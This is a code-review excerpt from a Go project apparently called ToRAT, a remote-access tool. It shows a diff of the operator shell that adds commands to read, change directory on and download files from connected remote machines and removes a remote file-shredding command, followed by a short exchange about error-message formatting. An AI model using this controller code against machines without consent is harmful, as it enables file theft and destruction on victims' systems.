torat_server/client_ishell.go

```diff
@@ -212,78 +108,66 @@ func (client *activeClient) ls(c *ishell.Context) {
 	}
 }
 
-func (client *activeClient) GetWd() error {
-	r := models.Dir{}
-	err := client.RPC.Call("API.LS", void, &r)
-	if err != nil {
-		client.Dir.Path = "unknown"
-		return err
-	}
-	client.Dir = r
-	return nil
-}
-
-func (client *activeClient) Shred(c *ishell.Context) {
-	args := models.Shred{
-		Conf: shred.Conf{
-			Times:  3,
-			Zeros:  true,
-			Remove: true,
-		},
-		Path: strings.Join(c.Args, " "),
-	}
-	var r error
-	err := client.RPC.Call("API.Shred", &args, &r)
+// CAT REMOTE FILE
+func (client *activeClient) Cat(c *ishell.Context) {
+	path := strings.Join(c.Args, " ")
+	var r string
+	err := client.RPC.Call("API.Cat", path, &r)
 	if err != nil {
-		c.Println(red("[!] Could not shred path:", args.Path, err, r))
+		c.Println(yellow("["+client.Client.Name+"] ") + red("[!] Could not cat file!"))
+		c.Println(yellow("["+client.Client.Name+"] ") + red("[!] ", err))
 	}
+	c.Println(r)
 }
 
-func (client *activeClient) GetHostname() error {
-	var encHostname models.EncAsym
+// CHANGE REMOTE DIRECTORY
+func (client *activeClient) Cd(c *ishell.Context) {
+	path := strings.Join(c.Args, " ")
+	r := models.Dir{}
+	err := client.RPC.Call("API.Cd", path, &r)
 
-	err := client.RPC.Call("API.Hostname", void, &encHostname)
-	if err != nil {
-		return err
-	}
-	byteHostname, err := crypto.DecAsym(encHostname)
 	if err != nil {
-		return err
+		c.Println(yellow("["+client.Client.Name+"] ") + red("[!] Could not change to that path!"))
+		c.Println(yellow("["+client.Client.Name+"] ") + red("[!] ", err))
 	}
-	client.Hostname = string(byteHostname)
-	return nil
+	client.Dir = r
 }
 
+// DOWNLOAD A REMOTE FILE
 func (client *activeClient) Download(c *ishell.Context) {
 	c.ProgressBar().Indeterminate(true)
 	c.ProgressBar().Start()
 	filename := strings.Join(c.Args, " ")
 	var r models.File
 	err := client.RPC.Call("API.SendFile", filename, &r)
 	if err != nil {
-		c.ProgressBar().Final(red("[!] Download failed:", err))
+		c.ProgressBar().Final(yellow("["+client.Client.Name+"] ") + red("[!] Download could not be sent to Server!"))
 		c.ProgressBar().Stop()
+		c.Println(yellow("["+client.Client.Name+"] ") + red("[!] ", err))
 	}
 	path := filepath.Join(client.Client.Path, filename)
 	err = ioutil.WriteFile(path, r.Content, 0600)
 	if err != nil {
-		c.ProgressBar().Final(red("[!] Download failed:", err))
+		c.ProgressBar().Final(green("[Server] ") + red("[!] Download failed to write to path!"))
```

Comment:
Because the error is coming from the server's file system. It gives context to what system has the path issue.

Reply:
Ok thats actually a good idea. 

This it better because it also includes what exactly went wrong.
```go
c.ProgressBar().Final(green("@Server ") + red("[!] Download failed", err))
```